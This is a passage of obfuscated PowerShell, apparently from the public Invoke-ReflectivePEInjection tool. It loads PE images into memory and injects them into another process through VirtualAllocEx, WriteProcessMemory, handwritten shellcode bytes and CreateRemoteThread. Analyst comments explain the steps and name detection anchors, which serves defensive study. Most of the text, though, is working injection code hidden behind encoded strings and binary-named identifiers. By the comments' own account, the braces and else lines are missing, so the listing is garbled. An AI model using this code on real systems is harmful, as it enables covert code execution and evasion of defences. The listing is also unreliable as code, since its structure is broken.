Write-Warning $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAZgBpAGwAZQAgAGIAZQBpAG4AZwAgAHIAZQBmAGwAZQBjAHQAaQB2AGUAbAB5ACAAbABvAGEAZABlAGQAIABpAHMAIABuAG8AdAAgAEEAUwBMAFIAIABjAG8AbQBwAGEAdABpAGIAbABlAC4AIABJAGYAIAB0AGgAZQAgAGwAbwBhAGQAaQBuAGcAIABmAGEAaQBsAHMALAAgAHQAcgB5ACAAcgBlAHMAdABhAHIAdABpAG4AZwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIABhAG4AZAAgAHQAcgB5AGkAbgBnACAAYQBnAGEAaQBuACAATwBSACAAdAByAHkAIAB1AHMAaQBuAGcAIAB0AGgAZQAgAC0ARgBvAHIAYwBlAEEAUwBMAFIAIABmAGwAYQBnACAAKABjAG8AdQBsAGQAIABjAGEAdQBzAGUAIABjAHIAYQBzAGgAZQBzACkA'))) -WarningAction Continue
[IntPtr]${00111111000110001} = ${_10110001101101110}
elseif (${_00100110100011000} -and (-not ${00110100101001110}))
{
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAZgBpAGwAZQAgAGQAbwBlAHMAbgAnAHQAIABzAHUAcABwAG8AcgB0ACAAQQBTAEwAUgAgAGIAdQB0ACAALQBGAG8AcgBjAGUAQQBTAEwAUgAgAGkAcwAgAHMAZQB0AC4AIABGAG8AcgBjAGkAbgBnACAAQQBTAEwAUgAgAG8AbgAgAHQAaABlACAAUABFACAAZgBpAGwAZQAuACAAVABoAGkAcwAgAGMAbwB1AGwAZAAgAHIAZQBzAHUAbAB0ACAAaQBuACAAYQAgAGMAcgBhAHMAaAAuAA==')))
}
if (${_00100110100011000} -and ${01101001000001101})
{
Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AbgBvAHQAIAB1AHMAZQAgAEYAbwByAGMAZQBBAFMATABSACAAdwBoAGUAbgAgAGwAbwBhAGQAaQBuAGcAIABpAG4AIAB0AG8AIABhACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAC4A'))) -ErrorAction Stop
}
if (${01101001000001101} -and (-not ${00110100101001110}))
{
Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAZABvAGUAcwBuACcAdAAgAHMAdQBwAHAAbwByAHQAIABBAFMATABSAC4AIABDAGEAbgBuAG8AdAAgAGwAbwBhAGQAIABhACAAbgBvAG4ALQBBAFMATABSACAAUABFACAAaQBuACAAdABvACAAYQAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwA='))) -ErrorAction Stop
}
${_10111111000001111} = [IntPtr]::Zero
${00001111011100111} = [IntPtr]::Zero
if (${01101001000001101} -eq $true)
${_10111111000001111} = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]${_00110100101000100}.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
${00001111011100111} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, ${00111111000110001}, [UIntPtr]${_00110100101000100}.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
if (${00001111011100111} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAC4AIABJAGYAIAB0AGgAZQAgAFAARQAgAGIAZQBpAG4AZwAgAGwAbwBhAGQAZQBkACAAZABvAGUAcwBuACcAdAAgAHMAdQBwAHAAbwByAHQAIABBAFMATABSACwAIABpAHQAIABjAG8AdQBsAGQAIABiAGUAIAB0AGgAYQB0ACAAdABoAGUAIAByAGUAcQB1AGUAcwB0AGUAZAAgAGIAYQBzAGUAIABhAGQAZAByAGUAcwBzACAAbwBmACAAdABoAGUAIABQAEUAIABpAHMAIABhAGwAcgBlAGEAZAB5ACAAaQBuACAAdQBzAGUA')))
if (${10111101111001110} -eq $true)
${_10111111000001111} = $Win32Functions.VirtualAlloc.Invoke(${00111111000110001}, [UIntPtr]${_00110100101000100}.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
${_10111111000001111} = $Win32Functions.VirtualAlloc.Invoke(${00111111000110001}, [UIntPtr]${_00110100101000100}.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
${00001111011100111} = ${_10111111000001111}
[IntPtr]${01100100110010111} = _01101001110001101 (${_10111111000001111}) ([Int64]${_00110100101000100}.SizeOfImage)
if (${_10111111000001111} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABBAGwAbABvAGMAIABmAGEAaQBsAGUAZAAgAHQAbwAgAGEAbABsAG8AYwBhAHQAZQAgAG0AZQBtAG8AcgB5ACAAZgBvAHIAIABQAEUALgAgAEkAZgAgAFAARQAgAGkAcwAgAG4AbwB0ACAAQQBTAEwAUgAgAGMAbwBtAHAAYQB0AGkAYgBsAGUALAAgAHQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAHQAaABlACAAcwBjAHIAaQBwAHQAIABpAG4AIABhACAAbgBlAHcAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAcAByAG8AYwBlAHMAcwAgACgAdABoAGUAIABuAGUAdwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIABwAHIAbwBjAGUAcwBzACAAdwBpAGwAbAAgAGgAYQB2AGUAIABhACAAZABpAGYAZgBlAHIAZQBuAHQAIABtAGUAbQBvAHIAeQAgAGwAYQB5AG8AdQB0ACwAIABzAG8AIAB0AGgAZQAgAGEAZABkAHIAZQBzAHMAIAB0AGgAZQAgAFAARQAgAHcAYQBuAHQAcwAgAG0AaQBnAGgAdAAgAGIAZQAgAGYAcgBlAGUAKQAuAA==')))
[System.Runtime.InteropServices.Marshal]::Copy(${_00000000110100000}, 0, ${_10111111000001111}, ${_00110100101000100}.SizeOfHeaders) | Out-Null
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAdABpAG4AZwAgAGQAZQB0AGEAaQBsAGUAZAAgAFAARQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAgAGYAcgBvAG0AIAB0AGgAZQAgAGgAZQBhAGQAZQByAHMAIABsAG8AYQBkAGUAZAAgAGkAbgAgAG0AZQBtAG8AcgB5AA==')))
${_00110100101000100} = _00011000111100111 -_10111111000001111 ${_10111111000001111} -Win32Types $Win32Types -Win32Constants $Win32Constants
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name EndAddress -Value ${01100100110010111}
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value ${00001111011100111}
Write-Verbose "StartAddress: $(_00100010111110111 ${_10111111000001111}) EndAddress: $(_00100010111110111 ${01100100110010111})"
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHAAeQAgAFAARQAgAHMAZQBjAHQAaQBvAG4AcwAgAGkAbgAgAHQAbwAgAG0AZQBtAG8AcgB5AA==')))
_10000010011101000 -_00000000110100000 ${_00000000110100000} -_00110100101000100 ${_00110100101000100} -Win32Functions $Win32Functions -Win32Types $Win32Types
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBwAGQAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGEAZABkAHIAZQBzAHMAZQBzACAAYgBhAHMAZQBkACAAbwBuACAAdwBoAGUAcgBlACAAdABoAGUAIABQAEUAIAB3AGEAcwAgAGEAYwB0AHUAYQBsAGwAeQAgAGwAbwBhAGQAZQBkACAAaQBuACAAbQBlAG0AbwByAHkA')))
_01101011110101010 -_00110100101000100 ${_00110100101000100} -_10110001101101110 ${_10110001101101110} -Win32Constants $Win32Constants -Win32Types $Win32Types
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAHAAbwByAHQAIABEAEwATAAnAHMAIABuAGUAZQBkAGUAZAAgAGIAeQAgAHQAaABlACAAUABFACAAdwBlACAAYQByAGUAIABsAG8AYQBkAGkAbgBnAA==')))
if (${01101001000001101} -eq $true)
_01001001100111111 -_00110100101000100 ${_00110100101000100} -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -_10010001100101011 ${_10010001100101011}
_01001001100111111 -_00110100101000100 ${_00110100101000100} -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
if (${01101001000001101} -eq $false)
if (${10111101111001110} -eq $true)
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBwAGQAYQB0AGUAIABtAGUAbQBvAHIAeQAgAHAAcgBvAHQAZQBjAHQAaQBvAG4AIABmAGwAYQBnAHMA')))
_01000100111001001 -_00110100101000100 ${_00110100101000100} -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAYgBlAGkAbgBnACAAcgBlAGYAbABlAGMAdABpAHYAZQBsAHkAIABsAG8AYQBkAGUAZAAgAGkAcwAgAG4AbwB0ACAAYwBvAG0AcABhAHQAaQBiAGwAZQAgAHcAaQB0AGgAIABOAFgAIABtAGUAbQBvAHIAeQAsACAAawBlAGUAcABpAG4AZwAgAG0AZQBtAG8AcgB5ACAAYQBzACAAcgBlAGEAZAAgAHcAcgBpAHQAZQAgAGUAeABlAGMAdQB0AGUA')))
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAYgBlAGkAbgBnACAAbABvAGEAZABlAGQAIABpAG4AIAB0AG8AIABhACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACwAIABuAG8AdAAgAGEAZABqAHUAcwB0AGkAbgBnACAAbQBlAG0AbwByAHkAIABwAGUAcgBtAGkAcwBzAGkAbwBuAHMA')))
if (${01101001000001101} -eq $true)
[UInt32]${01101111010110100} = 0
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${00001111011100111}, ${_10111111000001111}, [UIntPtr](${_00110100101000100}.SizeOfImage), [Ref]${01101111010110100})
if (${01100111110111001} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABzAGgAZQBsAGwAYwBvAGQAZQAgAHQAbwAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwAgAG0AZQBtAG8AcgB5AC4A')))
if (${_00110100101000100}.FileType -ieq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABMAEwA'))))
if (${01101001000001101} -eq $false)
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAGQAbABsAG0AYQBpAG4AIABzAG8AIAB0AGgAZQAgAEQATABMACAAawBuAG8AdwBzACAAaQB0ACAAaABhAHMAIABiAGUAZQBuACAAbABvAGEAZABlAGQA')))
${10111110111100111} = _01101001110001101 (${_00110100101000100}.PEHandle) (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
${00010000011001100} = _00101111101010001 @([IntPtr], [UInt32], [IntPtr]) ([Bool])
${10100000001010101} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10111110111100111}, ${00010000011001100})
${10100000001010101}.Invoke(${_00110100101000100}.PEHandle, 1, [IntPtr]::Zero) | Out-Null
${10111110111100111} = _01101001110001101 (${00001111011100111}) (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
if (${_00110100101000100}.PE64Bit -eq $true)
${00001111110000110} = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)
${10101110011000010} = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)
${10101111011000000} = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
${00001111110000110} = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)
${10101110011000010} = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)
${10101111011000000} = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)
${10100011000000001} = ${00001111110000110}.Length + ${10101110011000010}.Length + ${10101111011000000}.Length + (${01001001001010110} * 2)
${01101100010011100} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10100011000000001})
${10101000010001101} = ${01101100010011100}
_01011110000000101 -_00101110110110110 ${00001111110000110} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${00001111110000110}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${00001111011100111}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${10101110011000010} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${10101110011000010}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10111110111100111}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${10101111011000000} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${10101111011000000}.Length)
${00110110110011110} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, [UIntPtr][UInt64]${10100011000000001}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
if (${00110110110011110} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACAAZgBvAHIAIABzAGgAZQBsAGwAYwBvAGQAZQA=')))
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${00110110110011110}, ${10101000010001101}, [UIntPtr][UInt64]${10100011000000001}, [Ref]${01101111010110100})
if ((${01100111110111001} -eq $false) -or ([UInt64]${01101111010110100} -ne [UInt64]${10100011000000001}))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABzAGgAZQBsAGwAYwBvAGQAZQAgAHQAbwAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwAgAG0AZQBtAG8AcgB5AC4A')))
${01011010001111011} = _00100111111000100 -_10011010100110011 ${_10010001100101011} -_01110111110010110 ${00110110110011110} -Win32Functions $Win32Functions
${01111011110110011} = $Win32Functions.WaitForSingleObject.Invoke(${01011010001111011}, 20000)
if (${01111011110110011} -ne 0)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkACAAdABvACAAYwBhAGwAbAAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAgAGYAYQBpAGwAZQBkAC4A')))
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${00110110110011110}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
elseif (${_00110100101000100}.FileType -ieq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAEUA'))))
[IntPtr]${_10111110001100110} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)
[System.Runtime.InteropServices.Marshal]::WriteByte(${_10111110001100110}, 0, 0x00)
${10011010100101011} = _00001000001100111 -_00110100101000100 ${_00110100101000100} -Win32Functions $Win32Functions -Win32Constants $Win32Constants -_10110001000000101 ${_01011011000001101} -_10111110001100110 ${_10111110001100110}
[IntPtr]${01110101101011100} = _01101001110001101 (${_00110100101000100}.PEHandle) (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
Write-Verbose "Call EXE Main function. Address: $(_00100010111110111 ${01110101101011100}). Creating thread for the EXE to run in."
$Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, ${01110101101011100}, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null
while($true)
[Byte]${11000000111011101} = [System.Runtime.InteropServices.Marshal]::ReadByte(${_10111110001100110}, 0)
if (${11000000111011101} -eq 1)
_01000010000010111 -_00010001100101000 ${10011010100101011} -Win32Functions $Win32Functions -Win32Constants $Win32Constants
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAEUAIAB0AGgAcgBlAGEAZAAgAGgAYQBzACAAYwBvAG0AcABsAGUAdABlAGQALgA=')))
sleep -Seconds 1
return @(${_00110100101000100}.PEHandle, ${00001111011100111})
# _00100000100110011 -- tears down a PE image that was mapped by hand into the current
# process. Takes the image base address as a mandatory IntPtr.
# NOTE(review): delimiter and bare-keyword lines (`{`, `}`, `)`, `else`, `break`) appear
# to be missing from this listing, so the nesting described here is inferred from
# statement order and should be confirmed against an intact copy.
# Steps visible in the body:
#   1. Re-parses the image headers through _00011000111100111.
#   2. Walks the IMAGE_IMPORT_DESCRIPTOR array and calls FreeLibrary once per imported module.
#   3. Calls the image entry point with reason code 0 (DLL_PROCESS_DETACH in the DllMain contract).
#   4. Releases the image memory with VirtualFree(MEM_RELEASE).
# Failures in steps 2 and 4 are reported with Write-Warning only; nothing is thrown.
# Defender note: the native API member names (GetModuleHandle, FreeLibrary, VirtualFree) and
# Marshal::GetDelegateForFunctionPointer are left in clear text by the obfuscation, so they
# remain usable as content-match anchors even though identifiers and messages are encoded.
Function _00100000100110011
Param(
[Parameter(Position=0, Mandatory=$true)]
[IntPtr]
${_10111111000001111}
# Lookup tables produced by helpers defined earlier in the file: constants, native-function
# delegates, and reflected structure types.
$Win32Constants = _10101001111100001
$Win32Functions = _01011100100111011
$Win32Types = _10100111101101101
# Parsed header information for the image at the supplied base address.
${_00110100101000100} = _00011000111100111 -_10111111000001111 ${_10111111000001111} -Win32Types $Win32Types -Win32Constants $Win32Constants
# Only walk the import directory when the image declares one.
if (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
# First descriptor = image base + import directory RVA.
# _01101001110001101 is presumably a two-operand address-addition helper -- TODO confirm.
[IntPtr]${00001111100101111} = _01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
while ($true)
${00001010000101100} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${00001111100101111}, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
# An all-zero descriptor terminates the array. The loop exit that should follow the
# Write-Verbose below is not visible in this listing (see NOTE above).
if (${00001010000101100}.Characteristics -eq 0 `
-and ${00001010000101100}.FirstThunk -eq 0 `
-and ${00001010000101100}.ForwarderChain -eq 0 `
-and ${00001010000101100}.Name -eq 0 `
-and ${00001010000101100}.TimeDateStamp -eq 0)
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvAG4AZQAgAHUAbgBsAG8AYQBkAGkAbgBnACAAdABoAGUAIABsAGkAYgByAGEAcgBpAGUAcwAgAG4AZQBlAGQAZQBkACAAYgB5ACAAdABoAGUAIABQAEUA')))
# Imported module name: ANSI string at image base + descriptor.Name.
${00111101100010100} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((_01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${00001010000101100}.Name)))
${10001010011100010} = $Win32Functions.GetModuleHandle.Invoke(${00111101100010100})
# A null handle only produces a warning; as listed, FreeLibrary is still called with it.
if (${10001010011100010} -eq $null)
Write-Warning $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQByAHIAbwByACAAZwBlAHQAdABpAG4AZwAgAEQATABMACAAaABhAG4AZABsAGUAIABpAG4AIABNAGUAbQBvAHIAeQBGAHIAZQBlAEwAaQBiAHIAYQByAHkALAAgAEQATABMAE4AYQBtAGUAOgAgACQAewAwADAAMQAxADEAMQAwADEAMQAwADAAMAAxADAAMQAwADAAfQAuACAAQwBvAG4AdABpAG4AdQBpAG4AZwAgAGEAbgB5AHcAYQB5AHMA'))) -WarningAction Continue
${01100111110111001} = $Win32Functions.FreeLibrary.Invoke(${10001010011100010})
if (${01100111110111001} -eq $false)
Write-Warning $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABmAHIAZQBlACAAbABpAGIAcgBhAHIAeQA6ACAAJAB7ADAAMAAxADEAMQAxADAAMQAxADAAMAAwADEAMAAxADAAMAB9AC4AIABDAG8AbgB0AGkAbgB1AGkAbgBnACAAYQBuAHkAdwBhAHkAcwAuAA=='))) -WarningAction Continue
# Advance by the size of one descriptor.
${00001111100101111} = _01101001110001101 (${00001111100101111}) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
# Entry-point notification: a delegate of shape (IntPtr, UInt32, IntPtr) -> Bool is bound to
# image base + AddressOfEntryPoint and invoked with reason code 0.
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAGQAbABsAG0AYQBpAG4AIABzAG8AIAB0AGgAZQAgAEQATABMACAAawBuAG8AdwBzACAAaQB0ACAAaQBzACAAYgBlAGkAbgBnACAAdQBuAGwAbwBhAGQAZQBkAA==')))
${10111110111100111} = _01101001110001101 (${_00110100101000100}.PEHandle) (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
${00010000011001100} = _00101111101010001 @([IntPtr], [UInt32], [IntPtr]) ([Bool])
${10100000001010101} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10111110111100111}, ${00010000011001100})
${10100000001010101}.Invoke(${_00110100101000100}.PEHandle, 0, [IntPtr]::Zero) | Out-Null
# Release the whole mapping; failure is non-fatal.
${01100111110111001} = $Win32Functions.VirtualFree.Invoke(${_10111111000001111}, [UInt64]0, $Win32Constants.MEM_RELEASE)
if (${01100111110111001} -eq $false)
Write-Warning $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABjAGEAbABsACAAVgBpAHIAdAB1AGEAbABGAHIAZQBlACAAbwBuACAAdABoAGUAIABQAEUAJwBzACAAbQBlAG0AbwByAHkALgAgAEMAbwBuAHQAaQBuAHUAaQBuAGcAIABhAG4AeQB3AGEAeQBzAC4A'))) -WarningAction Continue
# _10110111100110100 (copy defined inside the script block) -- orchestrates one load:
# resolves an optional target process, maps the PE bytes through _00111010101101100, then
# runs the image and, for the local DLL case, unloads it again.
# Reads from enclosing scopes: ${_10101000101011101} (process id), ${_00010101111010101}
# (process name), ${_00000000110100000} (PE bytes), ${_01011011000001101} (argument string),
# ${_00000001011111110} (return-type selector) and ${_00100110100011000} (a switch).
# NOTE(review): delimiter and bare-keyword lines (`{`, `}`, `)`, `else`) appear to be missing
# from this listing; paired statements such as the two loader calls below were presumably
# the two arms of an if/else. Confirm against an intact copy before relying on the nesting.
# Defender note: messages and identifiers are encoded, but the native API member names
# (OpenProcess, VirtualFree) and Marshal::GetDelegateForFunctionPointer stay in clear text
# and can serve as content-match anchors for this code.
Function _10110111100110100
$Win32Functions = _01011100100111011
$Win32Types = _10100111101101101
$Win32Constants = _10101001111100001
# Handle to the target process; stays IntPtr.Zero when loading into the current process.
${_10010001100101011} = [IntPtr]::Zero
# Process id and process name are mutually exclusive.
if ((${_10101000101011101} -ne $null) -and (${_10101000101011101} -ne 0) -and (${_00010101111010101} -ne $null) -and (${_00010101111010101} -ne ""))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AJwB0ACAAcwB1AHAAcABsAHkAIABhACAAUAByAG8AYwBJAGQAIABhAG4AZAAgAFAAcgBvAGMATgBhAG0AZQAsACAAYwBoAG8AbwBzAGUAIABvAG4AZQAgAG8AcgAgAHQAaABlACAAbwB0AGgAZQByAA==')))
elseif (${_00010101111010101} -ne $null -and ${_00010101111010101} -ne "")
# Resolve the name with Get-Process (`ps`); exactly one match is required.
${00000111000001001} = @(ps -Name ${_00010101111010101} -ErrorAction SilentlyContinue)
if (${00000111000001001}.Count -eq 0)
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AJwB0ACAAZgBpAG4AZAAgAHAAcgBvAGMAZQBzAHMAIAAkAHsAXwAwADAAMAAxADAAMQAwADEAMQAxADEAMAAxADAAMQAwADEAfQA=')))
elseif (${00000111000001001}.Count -gt 1)
# Ambiguous name: print the candidates (name, id, session) and stop.
${00001100011100100} = ps | where { $_.Name -eq ${_00010101111010101} } | select ProcessName, Id, SessionId
echo ${00001100011100100}
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBvAHIAZQAgAHQAaABhAG4AIABvAG4AZQAgAGkAbgBzAHQAYQBuAGMAZQAgAG8AZgAgACQAewBfADAAMAAwADEAMAAxADAAMQAxADEAMQAwADEAMAAxADAAMQB9ACAAZgBvAHUAbgBkACwAIABwAGwAZQBhAHMAZQAgAHMAcABlAGMAaQBmAHkAIAB0AGgAZQAgAHAAcgBvAGMAZQBzAHMAIABJAEQAIAB0AG8AIABpAG4AagBlAGMAdAAgAGkAbgAgAHQAbwAuAA==')))
${_10101000101011101} = ${00000111000001001}[0].ID
if ((${_10101000101011101} -ne $null) -and (${_10101000101011101} -ne 0))
# Access mask 0x001F0FFF is the legacy PROCESS_ALL_ACCESS value. A cross-process handle
# request this broad is what process-access telemetry (e.g. Sysmon Event ID 10,
# GrantedAccess field) records, which makes this call a practical detection point.
${_10010001100101011} = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, ${_10101000101011101})
if (${_10010001100101011} -eq [IntPtr]::Zero)
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHUAbABkAG4AJwB0ACAAbwBiAHQAYQBpAG4AIAB0AGgAZQAgAGgAYQBuAGQAbABlACAAZgBvAHIAIABwAHIAbwBjAGUAcwBzACAASQBEADoAIAAkAHsAXwAxADAAMQAwADEAMAAwADAAMQAwADEAMAAxADEAMQAwADEAfQA=')))
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBvAHQAIAB0AGgAZQAgAGgAYQBuAGQAbABlACAAZgBvAHIAIAB0AGgAZQAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwAgAHQAbwAgAGkAbgBqAGUAYwB0ACAAaQBuACAAdABvAA==')))
# The message below decodes to "Calling Invoke-MemoryLoadLibrary", which suggests the loader
# helper _00111010101101100 carried that name before obfuscation; the naming is consistent
# with the publicly documented Invoke-ReflectivePEInjection script.
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAEkAbgB2AG8AawBlAC0ATQBlAG0AbwByAHkATABvAGEAZABMAGkAYgByAGEAcgB5AA==')))
${_10111111000001111} = [IntPtr]::Zero
# Local load omits the process handle; the second call passes it. As listed, both
# assignments run in sequence -- presumably an `else` separated them.
if (${_10010001100101011} -eq [IntPtr]::Zero)
${10000100001100101} = _00111010101101100 -_00000000110100000 ${_00000000110100000} -_01011011000001101 ${_01011011000001101} -_00100110100011000 ${_00100110100011000}
${10000100001100101} = _00111010101101100 -_00000000110100000 ${_00000000110100000} -_01011011000001101 ${_01011011000001101} -_10010001100101011 ${_10010001100101011} -_00100110100011000 ${_00100110100011000}
if (${10000100001100101} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABsAG8AYQBkACAAUABFACwAIABoAGEAbgBkAGwAZQAgAHIAZQB0AHUAcgBuAGUAZAAgAGkAcwAgAE4AVQBMAEwA')))
# The loader returns a two-element array: [0] is the local image handle; [1] is presumably
# the base address the image was prepared for (the target-process address when remote).
${_10111111000001111} = ${10000100001100101}[0]
${00101011001110001} = ${10000100001100101}[1]
${_00110100101000100} = _00011000111100111 -_10111111000001111 ${_10111111000001111} -Win32Types $Win32Types -Win32Constants $Win32Constants
# Case 1: DLL loaded into the current process. The selector ("WString", "String" or "Void")
# picks which export to resolve ("WStringFunc", "StringFunc" or "VoidFunc"); the export is
# called through a delegate and any returned string pointer is converted and echoed.
